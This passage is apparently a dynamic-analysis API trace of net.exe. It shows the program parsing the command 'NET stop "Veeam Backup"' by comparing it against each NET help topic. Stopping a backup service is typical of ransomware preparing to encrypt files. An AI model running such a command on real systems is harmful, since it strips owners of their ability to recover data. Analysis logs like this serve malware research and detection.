lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x1b [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET FILE\r\n[id [/CLOSE]]\r", _MaxCount=0x18) returned 13 [0200.345] LocalFree (hMem=0x783fa0) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/㾠x/") returned 0xbe [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET GROUP\r\n[groupname [/", _MaxCount=0x18) returned 12 [0200.345] LocalFree (hMem=0x787890) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/碐x/") returned 0x33 [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x18) returned 11 [0200.345] LocalFree (hMem=0x783fa0) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET HELPMSG\r\nmessage#\r\n\r", _MaxCount=0x18) returned 11 [0200.345] LocalFree (hMem=0x783fa0) returned 0x0 [0200.345] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/㾠x/") returned 0xc1 [0200.345] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET LOCALGROUP\r\n[groupna", _MaxCount=0x18) returned 7 [0200.345] LocalFree (hMem=0x787890) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/碐x/") returned 0x16 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x18) returned 3 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x33 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET SESSION\r\n[\\\\computer", _MaxCount=0x18) returned 15 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="碐x⡋瓢/㾠x/") returned 0x234 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x18) returned 12 [0200.346] LocalFree (hMem=0x787890) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/碐x/") returned 0x13 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START BROWSER\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START EVENTLOG\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START MESSENGER\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START NET LOGON\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x16 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㶸x⡋瓢/㾠x/") returned 0x11 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START RPCSS\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783db8) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㶸x/") returned 0x14 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START SCHEDULE\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x12 [0200.346] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START SERVER\r\n", _MaxCount=0x18) returned 14 [0200.346] LocalFree (hMem=0x783fa0) returned 0x0 [0200.346] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0xf [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START UPS\r\n", _MaxCount=0x18) returned 14 [0200.347] LocalFree (hMem=0x783fa0) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x17 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START WORKSTATION\r\n", _MaxCount=0x18) returned 14 [0200.347] LocalFree (hMem=0x783fa0) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x18 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x18) returned 14 [0200.347] LocalFree (hMem=0x783fa0) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x2a [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET STATISTICS\r\n[WORKSTA", _MaxCount=0x18) returned 14 [0200.347] LocalFree (hMem=0x783fa0) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x18) returned 19 [0200.347] LocalFree (hMem=0x783fa0) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0x58 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET TIME\r\n\r\n[\\\\computern", _MaxCount=0x18) returned -1 [0200.347] LocalFree (hMem=0x78b890) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x184 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET USE\r\n[devicename | *", _MaxCount=0x18) returned -2 [0200.347] LocalFree (hMem=0x78b890) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0xc7 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET USER\r\n[username [pas", _MaxCount=0x18) returned -2 [0200.347] LocalFree (hMem=0x78b890) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x47 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET VIEW\r\n[\\\\computernam", _MaxCount=0x18) returned -3 [0200.347] LocalFree (hMem=0x78b890) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0xc2 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NET\r\n [ ACCOUNTS | CO", _MaxCount=0x18) returned 19 [0200.347] LocalFree (hMem=0x78b890) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x319 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="SERVICES\r\nNET START can ", _MaxCount=0x18) returned -5 [0200.347] LocalFree (hMem=0x78b890) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x483 [0200.347] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="SYNTAX\r\nThe following co", _MaxCount=0x18) returned -5 [0200.347] LocalFree (hMem=0x78b890) returned 0x0 [0200.347] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0xa86 [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="NAMES\r\nThe following typ", _MaxCount=0x18) returned 4 [0200.348] LocalFree (hMem=0x78b890) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x54 [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup", _String2="\r\nFor more information o", _MaxCount=0x18) returned 97 [0200.348] LocalFree (hMem=0x78b890) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0xad [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET ACCOUNTS\r\n[/F", _MaxCount=0x11) returned 18 [0200.348] LocalFree (hMem=0x78b890) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x2e [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET COMPUTER\r\n\\\\c", _MaxCount=0x11) returned 16 [0200.348] LocalFree (hMem=0x783fa0) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0x7d [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET CONFIG SERVER", _MaxCount=0x11) returned 16 [0200.348] LocalFree (hMem=0x78b890) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x26 [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET CONFIG\r\n[SERV", _MaxCount=0x11) returned 16 [0200.348] LocalFree (hMem=0x783fa0) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET CONTINUE\r\nser", _MaxCount=0x11) returned 16 [0200.348] LocalFree (hMem=0x783fa0) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x1b [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET FILE\r\n[id [/C", _MaxCount=0x11) returned 13 [0200.348] LocalFree (hMem=0x783fa0) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0xbe [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET GROUP\r\n[group", _MaxCount=0x11) returned 12 [0200.348] LocalFree (hMem=0x78b890) returned 0x0 [0200.348] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x33 [0200.348] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET HELP\r\ncommand", _MaxCount=0x11) returned 11 [0200.348] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET HELPMSG\r\nmess", _MaxCount=0x11) returned 11 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0xc1 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET LOCALGROUP\r\n[", _MaxCount=0x11) returned 7 [0200.349] LocalFree (hMem=0x78b890) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x16 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET PAUSE\r\nservic", _MaxCount=0x11) returned 3 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x33 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET SESSION\r\n[\\\\c", _MaxCount=0x11) returned 15 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0x234 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET SHARE\r\nsharen", _MaxCount=0x11) returned 12 [0200.349] LocalFree (hMem=0x78b890) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/뢐x/") returned 0x13 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START BROWSER", _MaxCount=0x11) returned 14 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START CLIPBOO", _MaxCount=0x11) returned 14 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START EVENTLO", _MaxCount=0x11) returned 14 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START MESSENG", _MaxCount=0x11) returned 14 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START NET LOG", _MaxCount=0x11) returned 14 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x16 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START RPCLOCA", _MaxCount=0x11) returned 14 [0200.349] LocalFree (hMem=0x783fa0) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㶸x⡋瓢/㾠x/") returned 0x11 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START RPCSS\r\n", _MaxCount=0x11) returned 14 [0200.349] LocalFree (hMem=0x783db8) returned 0x0 [0200.349] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㶸x/") returned 0x14 [0200.349] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START SCHEDUL", _MaxCount=0x11) returned 14 [0200.350] LocalFree (hMem=0x783fa0) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x12 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START SERVER\r", _MaxCount=0x11) returned 14 [0200.350] LocalFree (hMem=0x783fa0) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0xf [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START UPS\r\n", _MaxCount=0x11) returned 14 [0200.350] LocalFree (hMem=0x783fa0) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x17 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START WORKSTA", _MaxCount=0x11) returned 14 [0200.350] LocalFree (hMem=0x783fa0) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x18 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET START\r\n[servi", _MaxCount=0x11) returned 14 [0200.350] LocalFree (hMem=0x783fa0) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x2a [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET STATISTICS\r\n[", _MaxCount=0x11) returned 14 [0200.350] LocalFree (hMem=0x783fa0) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET STOP\r\nservice", _MaxCount=0x11) returned 19 [0200.350] LocalFree (hMem=0x783fa0) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/㾠x/") returned 0x58 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET TIME\r\n\r\n[\\\\co", _MaxCount=0x11) returned -1 [0200.350] LocalFree (hMem=0x78b890) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x184 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET USE\r\n[devicen", _MaxCount=0x11) returned -2 [0200.350] LocalFree (hMem=0x78b890) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0xc7 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET USER\r\n[userna", _MaxCount=0x11) returned -2 [0200.350] LocalFree (hMem=0x78b890) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x47 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET VIEW\r\n[\\\\comp", _MaxCount=0x11) returned -3 [0200.350] LocalFree (hMem=0x78b890) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0xc2 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="NET\r\n [ ACCOUN", _MaxCount=0x11) returned 19 [0200.350] LocalFree (hMem=0x78b890) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x319 [0200.350] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="SERVICES\r\nNET STA", _MaxCount=0x11) returned -5 [0200.350] LocalFree (hMem=0x78b890) returned 0x0 [0200.350] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="뢐x⡋瓢/뢐x/") returned 0x483 [0200.351] _wcsnicmp (_String1="NET stop ΓÇ£Veeam", _String2="SYNTAX\r\nThe follo", _MaxCount=0x11) 